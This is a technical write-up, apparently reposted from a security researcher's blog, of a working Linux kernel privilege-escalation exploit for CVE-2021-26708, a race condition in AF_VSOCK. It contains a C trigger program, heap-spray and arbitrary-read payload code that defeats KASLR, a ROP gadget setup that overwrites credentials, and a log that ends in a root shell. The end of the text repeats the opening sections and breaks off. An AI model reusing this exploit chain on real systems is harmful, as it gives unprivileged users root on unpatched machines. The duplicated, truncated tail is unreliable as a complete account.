# CVE-2021-26708: Linux kernel before 5.10.13 privilege escalation vulnerability
https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html
==Vulnerability==
These vulnerabilities are race conditions caused by incorrect locking in net/vmw_vsock/af_vsock.c. The race conditions were implicitly introduced in November 2019 by the commits that added VSOCK multi-transport support, which were merged into Linux kernel v5.5-rc1.
CONFIG_VSOCKETS and CONFIG_VIRTIO_VSOCKETS are shipped as kernel modules in all major GNU/Linux distributions. The vulnerable modules are loaded automatically when you create a socket for the AF_VSOCK domain:
vsock = socket(AF_VSOCK, SOCK_STREAM, 0);
Creating an AF_VSOCK socket is available to unprivileged users and does not require user namespaces.
==Memory corruption==
The following describes how CVE-2021-26708 is exploited, using the race condition in vsock_stream_setsockopt(). Two threads are required to reproduce it. The first thread calls setsockopt():
setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
           &size, sizeof(unsigned long));
The second thread changes the virtual socket transport while vsock_stream_setsockopt() is trying to acquire the socket lock. It does so by reconnecting the virtual socket:
struct sockaddr_vm addr = {
    .svm_family = AF_VSOCK,
};
addr.svm_cid = VMADDR_CID_LOCAL;
connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));
addr.svm_cid = VMADDR_CID_HYPERVISOR;
connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));
In order to process the connect() of the virtual socket, the kernel executes vsock_stream_connect() which calls vsock_assign_transport(). This function contains the following code:
if (vsk->transport) {
    if (vsk->transport == new_transport)
        return 0;

    /* transport->release() must be called with sock lock acquired.
     * This path can only be taken during vsock_stream_connect(),
     * where we have already held the sock lock.
     * In the other cases, this function is called on a new socket
     * which is not assigned to any transport.
     */
    vsk->transport->release(vsk);
    vsock_deassign_transport(vsk);
}
vsock_stream_connect() holds the socket lock, and vsock_stream_setsockopt() in the parallel thread tries to acquire it as well, which sets up the race condition. When the second connect() is performed with a different svm_cid, vsock_deassign_transport() is called. It executes virtio_transport_destruct(), which frees vsock_sock.trans, and vsk->transport is set to NULL. Once vsock_stream_connect() releases the socket lock, vsock_stream_setsockopt() continues. It calls vsock_update_buffer_size(), which in turn calls transport->notify_buffer_size(). Here transport is a stale value held in a local variable, and it no longer matches vsk->transport (which is now NULL).
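The stale-pointer pattern described here can be modelled in user space. The following is a simplified, single-threaded sketch and not kernel code: `toy_sock`, `toy_transport`, `toy_lock()`, `racy_setsockopt()`, `fixed_setsockopt()` and `reconnect()` are hypothetical names, and the callback passed to `toy_lock()` stands in for the window in which the other thread owns the socket lock and drops the transport.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-ins for the kernel structures; not the real layout. */
struct toy_transport { int id; };

struct toy_sock {
    struct toy_transport *transport; /* may change while another thread holds the lock */
    int locked;
};

/* Models what a concurrent connect() does while it owns the lock. */
typedef void (*lock_window_fn)(struct toy_sock *sk);

static void toy_lock(struct toy_sock *sk, lock_window_fn other_thread)
{
    assert(sk != NULL);
    /* Before we get the lock, the other thread may run its critical section. */
    if (other_thread)
        other_thread(sk);
    sk->locked = 1;
}

static void toy_unlock(struct toy_sock *sk)
{
    sk->locked = 0;
}

/* Buggy ordering: the pointer is cached BEFORE the lock is taken. */
static struct toy_transport *racy_setsockopt(struct toy_sock *sk, lock_window_fn other)
{
    struct toy_transport *transport = sk->transport; /* read too early */

    toy_lock(sk, other);
    /* the real code would now call transport->notify_buffer_size() */
    toy_unlock(sk);
    return transport; /* pointer the buggy path would have used */
}

/* Safe ordering: the pointer is read only while the lock is held. */
static struct toy_transport *fixed_setsockopt(struct toy_sock *sk, lock_window_fn other)
{
    struct toy_transport *transport;

    toy_lock(sk, other);
    transport = sk->transport;
    toy_unlock(sk);
    return transport;
}

/* Models the effect of vsock_deassign_transport(): the transport is dropped. */
static void reconnect(struct toy_sock *sk)
{
    sk->transport = NULL;
}
```

With `reconnect` as the lock window, `racy_setsockopt()` still returns the old transport pointer although the socket no longer has one, while `fixed_setsockopt()` returns NULL.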
When the kernel executes virtio_transport_notify_buffer_size(), memory corruption occurs:
void virtio_transport_notify_buffer_size(struct vsock_sock *vsk, u64 *val)
{
    struct virtio_vsock_sock *vvs = vsk->trans;

    if (*val > VIRTIO_VSOCK_MAX_BUF_SIZE)
        *val = VIRTIO_VSOCK_MAX_BUF_SIZE;

    vvs->buf_alloc = *val;

    virtio_transport_send_credit_update(vsk, VIRTIO_VSOCK_TYPE_STREAM, NULL);
}
Here, vvs points to kernel memory that has already been freed in virtio_transport_destruct(). struct virtio_vsock_sock is 64 bytes in size and lives in the kmalloc-64 slab cache. The buf_alloc field has type u32 and is located at offset 40. VIRTIO_VSOCK_MAX_BUF_SIZE is 0xFFFFFFFFUL. The value of *val is controlled by the attacker, and its four least significant bytes are written into the freed memory.
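To make the four-byte write concrete, here is a minimal user-space sketch of the clamp-and-store logic quoted from virtio_transport_notify_buffer_size(). The names `toy_notify_buffer_size()` and `TOY_MAX_BUF_SIZE` are made up for this illustration. Note that, going by the quoted code, a requested size above the limit is clamped to 0xFFFFFFFF rather than truncated, so any value that fits in 32 bits passes through unchanged.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Same value as VIRTIO_VSOCK_MAX_BUF_SIZE in the text. */
#define TOY_MAX_BUF_SIZE 0xFFFFFFFFULL

/*
 * Model of the store into the u32 buf_alloc field.
 * *val is updated in place, as in the kernel function.
 */
static void toy_notify_buffer_size(uint32_t *buf_alloc, uint64_t *val)
{
    assert(buf_alloc != NULL && val != NULL);

    if (*val > TOY_MAX_BUF_SIZE)
        *val = TOY_MAX_BUF_SIZE;   /* clamp to the 32-bit maximum */

    *buf_alloc = (uint32_t)*val;   /* only four bytes are written */
}
```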
==Fuzzing==
The syzkaller fuzzer could not reproduce this crash, so I decided to investigate it myself. Why did the fuzzer fail? Looking at vsock_update_buffer_size() gives the answer:
if (val != vsk->buffer_size &&
    transport && transport->notify_buffer_size)
    transport->notify_buffer_size(vsk, &val);

vsk->buffer_size = val;
notify_buffer_size() is called only when val differs from the current buffer_size. In other words, each setsockopt() call with SO_VM_SOCKETS_BUFFER_SIZE must pass a different size value. So I wrote the following code:
/*
 * AF_VSOCK vulnerability trigger.
 * It's a PoC just for fun.
 * Author: Alexander Popov.
 */

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/socket.h>
#include <linux/vm_sockets.h>

#define err_exit(msg) do { perror(msg); exit(EXIT_FAILURE); } while (0)

#define MAX_RACE_LAG_USEC 50

int vsock = -1;
int tfail = 0;
pthread_barrier_t barrier;

/* Wait on the barrier, then busy-loop for lag_nsec nanoseconds. */
int thread_sync(long lag_nsec)
{
    int ret = -1;
    struct timespec ts0;
    struct timespec ts;
    long delta_nsec = 0;

    ret = pthread_barrier_wait(&barrier);
    if (ret != 0 && ret != PTHREAD_BARRIER_SERIAL_THREAD) {
        perror("[-] pthread_barrier_wait");
        return EXIT_FAILURE;
    }

    ret = clock_gettime(CLOCK_MONOTONIC, &ts0);
    if (ret != 0) {
        perror("[-] clock_gettime");
        return EXIT_FAILURE;
    }

    while (delta_nsec < lag_nsec) {
        ret = clock_gettime(CLOCK_MONOTONIC, &ts);
        if (ret != 0) {
            perror("[-] clock_gettime");
            return EXIT_FAILURE;
        }
        delta_nsec = (ts.tv_sec - ts0.tv_sec) * 1000000000 +
                     ts.tv_nsec - ts0.tv_nsec;
    }

    return EXIT_SUCCESS;
}

/* Reconnect the socket twice so that the transport changes. */
void *th_connect(void *arg)
{
    int ret = -1;
    long lag_nsec = *((long *)arg) * 1000;
    struct sockaddr_vm addr = {
        .svm_family = AF_VSOCK,
    };

    ret = thread_sync(lag_nsec);
    if (ret != EXIT_SUCCESS) {
        tfail++;
        return NULL;
    }

    addr.svm_cid = VMADDR_CID_LOCAL;
    connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));

    addr.svm_cid = VMADDR_CID_HYPERVISOR;
    connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));

    return NULL;
}

/* Set a buffer size that differs on every call. */
void *th_setsockopt(void *arg)
{
    int ret = -1;
    long lag_nsec = *((long *)arg) * 1000;
    struct timespec tp;
    unsigned long size = 0;

    ret = thread_sync(lag_nsec);
    if (ret != EXIT_SUCCESS) {
        tfail++;
        return NULL;
    }

    clock_gettime(CLOCK_MONOTONIC, &tp);
    size = tp.tv_nsec;
    setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
               &size, sizeof(unsigned long));

    return NULL;
}

int main(void)
{
    int ret = -1;
    unsigned long size = 0;
    long loop = 0;
    pthread_t th[2] = { 0 };

    vsock = socket(AF_VSOCK, SOCK_STREAM, 0);
    if (vsock == -1)
        err_exit("[-] open vsock");

    printf("[+] AF_VSOCK socket is opened\n");

    size = 1;
    setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_MIN_SIZE,
               &size, sizeof(unsigned long));
    size = 0xfffffffffffffffdlu;
    setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_MAX_SIZE,
               &size, sizeof(unsigned long));

    ret = pthread_barrier_init(&barrier, NULL, 2);
    if (ret != 0)
        err_exit("[-] pthread_barrier_init");

    for (loop = 0; loop < 30000; loop++) {
        long tmo1 = 0;
        long tmo2 = loop % MAX_RACE_LAG_USEC;

        printf("race loop %ld: tmo1 %ld, tmo2 %ld\n", loop, tmo1, tmo2);

        ret = pthread_create(&th[0], NULL, th_connect, &tmo1);
        if (ret != 0)
            err_exit("[-] pthread_create #0");

        ret = pthread_create(&th[1], NULL, th_setsockopt, &tmo2);
        if (ret != 0)
            err_exit("[-] pthread_create #1");

        ret = pthread_join(th[0], NULL);
        if (ret != 0)
            err_exit("[-] pthread_join #0");

        ret = pthread_join(th[1], NULL);
        if (ret != 0)
            err_exit("[-] pthread_join #1");

        if (tfail) {
            printf("[-] some thread got troubles\n");
            exit(EXIT_FAILURE);
        }
    }

    ret = close(vsock);
    if (ret)
        perror("[-] close");

    printf("[+] now see your warnings in the kernel log\n");
    return 0;
}
Here the size value is taken from the nanosecond count returned by clock_gettime(), so it is likely to differ on every call. The original syzkaller does not do this: the values of syscall parameters are fixed when syzkaller generates the fuzzing input and do not change during execution.
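The effect of the `val != vsk->buffer_size` check can be seen in a small user-space model. This is only a sketch of the condition quoted from vsock_update_buffer_size(); `toy_vsk`, `notify_calls` and `toy_update_buffer_size()` are hypothetical names, and the counter replaces the real notify_buffer_size() callback.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

struct toy_vsk {
    uint64_t buffer_size;
    int notify_calls;   /* counts simulated notify_buffer_size() invocations */
};

/* Simplified model of the check in vsock_update_buffer_size(). */
static void toy_update_buffer_size(struct toy_vsk *vsk, uint64_t val)
{
    assert(vsk != NULL);

    if (val != vsk->buffer_size)
        vsk->notify_calls++;    /* the vulnerable callback would run here */

    vsk->buffer_size = val;
}
```

Calling the function repeatedly with the same value reaches the callback only once, which is consistent with a fuzzer that replays fixed syscall arguments hitting the vulnerable path at most on its first attempt.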
== The power of four bytes ==
I chose Fedora 33 Server as the research target, with kernel version 5.10.11-200.fc33.x86_64, and I was determined to bypass SMEP and SMAP.
As a first step, I looked for a stable heap spray: user-space activity that makes the kernel allocate another 64-byte object at the location of the freed virtio_vsock_sock. After several experiments I confirmed that the freed virtio_vsock_sock could be overwritten, which showed that heap spraying was feasible. Eventually I settled on the msgsnd() syscall. It creates a struct msg_msg in kernel space, as the pahole output shows:
struct msg_msg {
    struct list_head           m_list;               /*     0    16 */
    long int                   m_type;               /*    16     8 */
    size_t                     m_ts;                 /*    24     8 */
    struct msg_msgseg *        next;                 /*    32     8 */
    void *                     security;             /*    40     8 */

    /* size: 48, cachelines: 1, members: 5 */
    /* last cacheline: 48 bytes */
};
The message header comes first, followed by the message data. If struct msgbuf in user space has a 16-byte mtext, the corresponding msg_msg is created in the kmalloc-64 slab cache. A 4-byte write-after-free corrupts the void *security pointer at offset 40. The msg_msg.security field points to kernel data allocated by lsm_msg_msg_alloc(), and it is freed by security_msg_msg_free() when the msg_msg is received. Corrupting the first half of the security pointer (its four least significant bytes on little-endian x86_64) therefore yields an arbitrary free.
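The layout argument can be checked with a user-space mirror of the structure. The sketch below assumes a 64-bit little-endian target such as x86_64; `toy_msg_msg`, `toy_list_head` and `toy_corrupt_security()` are illustrative names, and the pointer values in the usage note are made up for the example.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* User-space mirror of the pahole output; valid for 64-bit builds only. */
struct toy_list_head { void *next, *prev; };

struct toy_msg_msg {
    struct toy_list_head m_list;
    long m_type;
    size_t m_ts;
    void *next;
    void *security;
};

/*
 * Overwrite the four bytes at offset 40, as the u32 buf_alloc store would,
 * and return the resulting value of the security pointer.
 */
static uint64_t toy_corrupt_security(uint64_t security, uint32_t buf_alloc)
{
    struct toy_msg_msg m;
    uint64_t out;

    assert(sizeof(void *) == 8);
    assert(offsetof(struct toy_msg_msg, security) == 40);

    memset(&m, 0, sizeof(m));
    memcpy(&m.security, &security, sizeof(security));
    memcpy((unsigned char *)&m + 40, &buf_alloc, sizeof(buf_alloc));
    memcpy(&out, &m.security, sizeof(out));
    return out;
}
```

For example, `toy_corrupt_security(0xffff888011223344, 0xc25a4d00)` keeps the upper half of the pointer and replaces the lower half. The 48-byte header plus 16 bytes of mtext adds up to the 64 bytes of a kmalloc-64 object.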
==Kernel Information Leak==
The same technique as in [https://www.pwnwiki.org/index.php?title=CVE-2019-18683_Linux_kernel_through_5.3.8_%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E CVE-2019-18683] is used here. The second connect() on the virtual socket calls vsock_deassign_transport() and sets vsk->transport to NULL. As a result, vsock_stream_setsockopt() calls virtio_transport_send_pkt_info() after the memory corruption, and a kernel warning appears:
WARNING: CPU: 1 PID: 6739 at net/vmw_vsock/virtio_transport_common.c:34
...
CPU: 1 PID: 6739 Comm: racer Tainted: G W 5.10.11-200.fc33.x86_64 #1
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.13.0-2.fc32 04/01/2014
RIP: 0010:virtio_transport_send_pkt_info+0x14d/0x180 [vmw_vsock_virtio_transport_common]
...
RSP: 0018:ffffc90000d07e10 EFLAGS: 00010246
RAX: 0000000000000000 RBX: ffff888103416ac0 RCX: ffff88811e845b80
RDX: 00000000ffffffff RSI: ffffc90000d07e58 RDI: ffff888103416ac0
RBP: 0000000000000000 R08: 00000000052008af R09: 0000000000000000
R10: 0000000000000126 R11: 0000000000000000 R12: 0000000000000008
R13: ffffc90000d07e58 R14: 0000000000000000 R15: ffff888103416ac0
FS: 00007f2f123d5640(0000) GS:ffff88817bd00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007f81ffc2a000 CR3: 000000011db96004 CR4: 0000000000370ee0
Call Trace:
 virtio_transport_notify_buffer_size+0x60/0x70 [vmw_vsock_virtio_transport_common]
 vsock_update_buffer_size+0x5f/0x70 [vsock]
 vsock_stream_setsockopt+0x128/0x270 [vsock]
...
Debugging with gdb showed that the RCX register contains the kernel address of the freed virtio_vsock_sock, and the RBX register contains the kernel address of vsock_sock.
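Extracting a register value from such a warning is plain string parsing. The following sketch shows one way to do it for a single log line; `toy_parse_reg()` is a hypothetical helper written for this illustration and is not taken from the original exploit.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/*
 * Find "<name>: <hex>" in a kernel log line and store the value in *out.
 * Returns 0 on success, -1 if the register is not present on the line.
 */
static int toy_parse_reg(const char *line, const char *name,
                         unsigned long long *out)
{
    size_t len;
    const char *p;

    assert(line != NULL && name != NULL && out != NULL);

    len = strlen(name);
    p = line;
    while ((p = strstr(p, name)) != NULL) {
        /* Accept only a whole token: at line start or after a space. */
        int token_start = (p == line) || (p[-1] == ' ');

        if (token_start && p[len] == ':') {
            const char *num = p + len + 1;
            char *end;
            unsigned long long v = strtoull(num, &end, 16);

            if (end != num) {   /* at least one hex digit was consumed */
                *out = v;
                return 0;
            }
        }
        p += len;
    }
    return -1;
}
```

Applied to the register line of the warning above, looking up "RCX" yields ffff88811e845b80 and "RBX" yields ffff888103416ac0.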
==Achieve arbitrary reading==
===From arbitrary free to use-after-free===
1. Free an object at the leaked kernel address.
2. Spray the heap to overwrite that object with controlled data.
3. Use the corrupted object for privilege escalation.
The kernel's System V message implementation limits the message data stored alongside the msg_msg header to DATALEN_MSG, that is, PAGE_SIZE minus sizeof(struct msg_msg). If you send a larger message, the remainder is stored in a list of message segments. msg_msg contains struct msg_msgseg *next, which points to the first segment, and size_t m_ts, which stores the size. When overwriting a msg_msg, you can therefore put controlled values into msg_msg.m_ts and msg_msg.next:

Payload:
#define PAYLOAD_SZ 40

void adapt_xattr_vs_sysv_msg_spray(unsigned long kaddr)
{
    struct msg_msg *msg_ptr;

    xattr_addr = spray_data + PAGE_SIZE * 4 - PAYLOAD_SZ;

    /* Don't touch the second part to avoid breaking page fault delivery */
    memset(spray_data, 0xa5, PAGE_SIZE * 4);

    printf("[+] adapt the msg_msg spraying payload:\n");
    msg_ptr = (struct msg_msg *)xattr_addr;
    msg_ptr->m_type = 0x1337;
    msg_ptr->m_ts = ARB_READ_SZ;
    msg_ptr->next = (struct msg_msgseg *)kaddr; /* set the segment ptr for arbitrary read */
    printf("\tmsg_ptr %p\n\tm_type %lx at %p\n\tm_ts %zu at %p\n\tmsgseg next %p at %p\n",
           msg_ptr,
           msg_ptr->m_type, &(msg_ptr->m_type),
           msg_ptr->m_ts, &(msg_ptr->m_ts),
           msg_ptr->next, &(msg_ptr->next));
}
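The placement of the payload can be verified with a little address arithmetic. This sketch assumes 4 KiB pages and uses the spray_data address printed in the exploit log at the end of this page; `toy_xattr_addr()` and `toy_fault_page()` are names invented for the illustration. The 40 payload bytes cover m_list, m_type, m_ts and next (offsets 0 to 39), so the byte that would hold security at offset 40 is the first byte of the page that the log reports as configured for userfaultfd.

```c
#include <assert.h>
#include <stdint.h>

#define TOY_PAGE_SIZE   4096ULL  /* assumption: 4 KiB pages, as on x86_64 */
#define TOY_PAYLOAD_SZ  40ULL    /* PAYLOAD_SZ from the snippet above */

/* Address where the fake msg_msg header starts inside spray_data. */
static uint64_t toy_xattr_addr(uint64_t spray_data)
{
    assert(spray_data % TOY_PAGE_SIZE == 0);   /* mmap() returns page-aligned memory */
    return spray_data + TOY_PAGE_SIZE * 4 - TOY_PAYLOAD_SZ;
}

/* First address past the four pages filled by memset(). */
static uint64_t toy_fault_page(uint64_t spray_data)
{
    assert(spray_data % TOY_PAGE_SIZE == 0);
    return spray_data + TOY_PAGE_SIZE * 4;
}
```

For spray_data at 0x7f0d9111d000 this gives msg_ptr 0x7f0d91120fd8, with m_type, m_ts and next at offsets 16, 24 and 32 from it, which matches the addresses printed by the exploit.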
But how can msg_msg be used to read kernel data? Reading the msgrcv() system call documentation, I found a good solution: calling msgrcv() with the MSG_COPY flag:
MSG_COPY (since Linux 3.8)
Nondestructively fetch a copy of the message at the ordinal position in the queue
specified by msgtyp (messages are considered to be numbered starting at 0).
This flag makes the kernel copy the message data to user space without removing the message from the queue. MSG_COPY is available when the kernel is built with CONFIG_CHECKPOINT_RESTORE=y, which is the case for Fedora Server.
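How a read of m_ts bytes is divided between the message head and its segments follows from DATALEN_MSG. The sketch below assumes 4 KiB pages and the 48-byte struct msg_msg reported by pahole; `toy_split_read()` and `struct toy_split` are hypothetical names, and the model lumps all segments together because only the first one matters here.

```c
#include <assert.h>
#include <stddef.h>

#define TOY_PAGE_SIZE     4096u
#define TOY_MSG_MSG_SIZE  48u    /* sizeof(struct msg_msg) per pahole */
#define TOY_DATALEN_MSG   (TOY_PAGE_SIZE - TOY_MSG_MSG_SIZE)

struct toy_split {
    size_t from_head;      /* bytes stored right after the msg_msg header */
    size_t from_segments;  /* bytes reached through msg_msg.next */
};

/* Split a message of m_ts bytes into head and segment parts. */
static struct toy_split toy_split_read(size_t m_ts)
{
    struct toy_split s;

    assert(TOY_PAGE_SIZE > TOY_MSG_MSG_SIZE);

    s.from_head = m_ts < TOY_DATALEN_MSG ? m_ts : TOY_DATALEN_MSG;
    s.from_segments = m_ts - s.from_head;
    return s;
}
```

With the m_ts value of 6096 shown in the exploit log, 4048 bytes come from the message head and 2048 bytes come from the memory that msg_msg.next points to. This is why the leaked fields appear at DATALEN_MSG plus their offset in the received buffer.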
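Count the available CPUs using sched_getaffinity() and CPU_COUNT() (the exploit needs at least two);
Open /dev/kmsg for parsing;
mmap() the spray_data memory area and configure userfaultfd() for its last part;
Start a separate pthread to handle userfaultfd() events;
Start 127 threads for setxattr() & userfaultfd() heap spraying over msg_msg and park them on a thread_barrier;
Get the kernel address of the original msg_msg:
Win the race on the virtual socket;
After the second connect(), wait for 35 microseconds in a busy loop;
Call msgsnd() on a separate message queue; after the memory corruption, the msg_msg object is placed at the virtio_vsock_sock location;
Parse the kernel log and save the kernel address of this msg_msg from the kernel warning (RCX register);
Also save the kernel address of vsock_sock from the RBX register;
Perform an arbitrary free of the original msg_msg using a corrupted msg_msg:
Use four bytes of the original msg_msg address as the SO_VM_SOCKETS_BUFFER_SIZE value, which is what gets written by the memory corruption;
Win the race on the virtual socket;
Call msgsnd() immediately after the second connect(); the msg_msg is placed at the virtio_vsock_sock location and gets corrupted;
The security pointer of the corrupted msg_msg now stores the address of the original msg_msg (obtained in the previous stage);
In this case msgsnd() returns -1 and the corrupted msg_msg is destroyed; freeing msg_msg.security frees the original msg_msg;
Overwrite the original msg_msg with a controlled payload:
Right after msgsnd() fails, the exploit calls pthread_barrier_wait(), which releases the 127 heap-spraying pthreads;
These pthreads execute setxattr() with the payload;
The original msg_msg is overwritten with the controlled data, and its msg_msg.next pointer stores the address of the vsock_sock object;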

ret = msgrcv(msg_locations[0].msq_id, kmem, ARB_READ_SZ, 0,
             IPC_NOWAIT | MSG_COPY | MSG_NOERROR);
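1. Many pointers to objects in dedicated slab caches, such as PINGv6 and sock_inode_cache.
2. The struct mem_cgroup *sk_memcg pointer at offset 664 in vsock_sock.sk. The mem_cgroup structure is allocated in the kmalloc-4k slab cache.
3. The const struct cred *owner pointer at offset 840 in vsock_sock.sk. It stores the address of the credentials that can be overwritten for privilege escalation.
4. The void (*sk_write_space)(struct sock *) function pointer at offset 688 in vsock_sock.sk. It is set to the address of the sock_def_write_space() kernel function and can be used to calculate the KASLR offset.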
#define SK_MEMCG_OFFSET             664 /* offset of sk_memcg given in the list above */
#define SK_MEMCG_RD_LOCATION        (DATALEN_MSG + SK_MEMCG_OFFSET)
#define OWNER_CRED_OFFSET           840
#define OWNER_CRED_RD_LOCATION      (DATALEN_MSG + OWNER_CRED_OFFSET)
#define SK_WRITE_SPACE_OFFSET       688
#define SK_WRITE_SPACE_RD_LOCATION  (DATALEN_MSG + SK_WRITE_SPACE_OFFSET)

/*
 * From Linux kernel 5.10.11-200.fc33.x86_64:
 * function pointer for calculating KASLR secret
 */
#define SOCK_DEF_WRITE_SPACE        0xffffffff819851b0lu

unsigned long sk_memcg = 0;
unsigned long owner_cred = 0;
unsigned long sock_def_write_space = 0;
unsigned long kaslr_offset = 0;

/* ... */

sk_memcg = kmem[SK_MEMCG_RD_LOCATION / sizeof(uint64_t)];
printf("[+] Found sk_memcg %lx (offset %ld in the leaked kmem)\n",
       sk_memcg, SK_MEMCG_RD_LOCATION);

owner_cred = kmem[OWNER_CRED_RD_LOCATION / sizeof(uint64_t)];
printf("[+] Found owner cred %lx (offset %ld in the leaked kmem)\n",
       owner_cred, OWNER_CRED_RD_LOCATION);

sock_def_write_space = kmem[SK_WRITE_SPACE_RD_LOCATION / sizeof(uint64_t)];
printf("[+] Found sock_def_write_space %lx (offset %ld in the leaked kmem)\n",
       sock_def_write_space, SK_WRITE_SPACE_RD_LOCATION);

kaslr_offset = sock_def_write_space - SOCK_DEF_WRITE_SPACE;
printf("[+] Calculated kaslr offset: %lx\n", kaslr_offset);
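The numbers in this snippet can be cross-checked against the exploit log at the end of this page. The sketch below assumes DATALEN_MSG is 4048 (4 KiB pages minus the 48-byte struct msg_msg); `toy_rd_location()` and `toy_kaslr_offset()` are illustrative helpers, not part of the original code.

```c
#include <assert.h>
#include <stdint.h>

#define TOY_DATALEN_MSG           4048UL                /* assumption: 4096 - 48 */
#define TOY_SOCK_DEF_WRITE_SPACE  0xffffffff819851b0ULL /* SOCK_DEF_WRITE_SPACE above */

/* Position of a vsock_sock field inside the buffer returned by msgrcv(). */
static unsigned long toy_rd_location(unsigned long field_offset)
{
    return TOY_DATALEN_MSG + field_offset;
}

/* KASLR offset: leaked runtime address minus the address without KASLR. */
static uint64_t toy_kaslr_offset(uint64_t leaked_sock_def_write_space)
{
    assert(leaked_sock_def_write_space >= TOY_SOCK_DEF_WRITE_SPACE);
    return leaked_sock_def_write_space - TOY_SOCK_DEF_WRITE_SPACE;
}
```

The offsets 664, 840 and 688 map to positions 4712, 4888 and 4736 in the leaked buffer, and the leaked pointer ffffffffab9851b0 gives a KASLR offset of 2a000000, as printed in the log.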
#define SKB_SIZE            4096
#define SKB_SHINFO_OFFSET   3776
#define MY_UINFO_OFFSET     256
#define SKBTX_DEV_ZEROCOPY  (1 << 3)

void prepare_xattr_vs_skb_spray(void)
{
    struct skb_shared_info *info = NULL;

    xattr_addr = spray_data + PAGE_SIZE * 4 - SKB_SIZE + 4;

    /* Don't touch the second part to avoid breaking page fault delivery */
    memset(spray_data, 0x0, PAGE_SIZE * 4);

    info = (struct skb_shared_info *)(xattr_addr + SKB_SHINFO_OFFSET);
    info->tx_flags = SKBTX_DEV_ZEROCOPY;
    info->destructor_arg = uaf_write_value + MY_UINFO_OFFSET;

    uinfo_p = (struct ubuf_info *)(xattr_addr + MY_UINFO_OFFSET);

    /*
     * A single ROP gadget for arbitrary write:
     *   mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rdx + rcx*8], rsi ; ret
     * Here rdi stores uinfo_p address, rcx is 0, rsi is 1
     */
    uinfo_p->callback = ARBITRARY_WRITE_GADGET + kaslr_offset;
    uinfo_p->desc = owner_cred + CRED_EUID_EGID_OFFSET; /* value for "qword ptr [rdi + 8]" */
    uinfo_p->desc = uinfo_p->desc - 1; /* rsi value 1 should not get into euid */
[a13x@localhost ~]$ ./vsock_pwn
=================================================
==== CVE-2021-26708 PoC exploit by a13xp0p0v ====
=================================================
[+] begin as: uid=1000, euid=1000
[+] we have 2 CPUs for racing
[+] getting ready...
[+] remove old files for ftok()
[+] spray_data at 0x7f0d9111d000
[+] userfaultfd #1 is configured: start 0x7f0d91121000, len 0x1000
[+] fault_handler for uffd 38 is ready
[+] stage I: collect good msg_msg locations
[+] go racing, show wins:
save msg_msg ffff9125c25a4d00 in msq 11 in slot 0
save msg_msg ffff9125c25a4640 in msq 12 in slot 1
save msg_msg ffff9125c25a4780 in msq 22 in slot 2
save msg_msg ffff9125c3668a40 in msq 78 in slot 3
[+] stage II: arbitrary free msg_msg using corrupted msg_msg
kaddr for arb free: ffff9125c25a4d00
kaddr for arb read: ffff9125c2035300
[+] adapt the msg_msg spraying payload:
msg_ptr 0x7f0d91120fd8
m_type 1337 at 0x7f0d91120fe8
m_ts 6096 at 0x7f0d91120ff0
msgseg next 0xffff9125c2035300 at 0x7f0d91120ff8
[+] go racing, show wins:
[+] stage III: arbitrary read vsock via good overwritten msg_msg (msq 11)
[+] msgrcv returned 6096 bytes
[+] Found sk_memcg ffff9125c42f9000 (offset 4712 in the leaked kmem)
[+] Found owner cred ffff9125c3fd6e40 (offset 4888 in the leaked kmem)
[+] Found sock_def_write_space ffffffffab9851b0 (offset 4736 in the leaked kmem)
[+] Calculated kaslr offset: 2a000000
[+] stage IV: search sprayed skb near sk_memcg...
[+] checking possible skb location: ffff9125c42fa000
[+] stage IV part I: repeat arbitrary free msg_msg using corrupted msg_msg
kaddr for arb free: ffff9125c25a4640
kaddr for arb read: ffff9125c42fa030
[+] adapt the msg_msg spraying payload:
msg_ptr 0x7f0d91120fd8
m_type 1337 at 0x7f0d91120fe8
m_ts 6096 at 0x7f0d91120ff0
msgseg next 0xffff9125c42fa030 at 0x7f0d91120ff8
[+] go racing, show wins: 0 0 20 15 42 11
[+] stage IV part II: arbitrary read skb via good overwritten msg_msg (msq 12)
[+] msgrcv returned 6096 bytes
[+] found a real skb
[+] stage V: try to do UAF on skb at ffff9125c42fa000
[+] skb payload:
start at 0x7f0d91120004
skb_shared_info at 0x7f0d91120ec4
tx_flags 0x8
destructor_arg 0xffff9125c42fa100
callback 0xffffffffab64f6d4
desc 0xffff9125c3fd6e53
[+] go racing, show wins: 15
[+] stage VI: repeat UAF on skb at ffff9125c42fa000
[+] go racing, show wins: 0 12 13 15 3 12 4 16 17 18 9 47 5 12 13 9 13 19 9 10 13 15 12 13 15 17 30
[+] finish as: uid=0, euid=0
[+] starting the root shell...
uid=0(root) gid=0(root) groups=0(root),1000(a13x) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html
==Vulnerability==
These vulnerabilities are race conditions caused by incorrect locking in net/vmw_vsock/af_vsock.c. The race conditions were implicitly introduced by the commits that added VSOCK multi-transport support in November 2019, which were merged in Linux kernel 5.5-rc1.
CONFIG_VSOCKETS and CONFIG_VIRTIO_VSOCKETS are provided as kernel modules in all major GNU/Linux distributions. When you create a socket for the AF_VSOCK domain, these vulnerable modules are automatically loaded.
vsock = socket(AF_VSOCK, SOCK_STREAM, 0);
Creating AF_VSOCK sockets is available to unprivileged users and does not require user namespaces.
==Memory corruption==
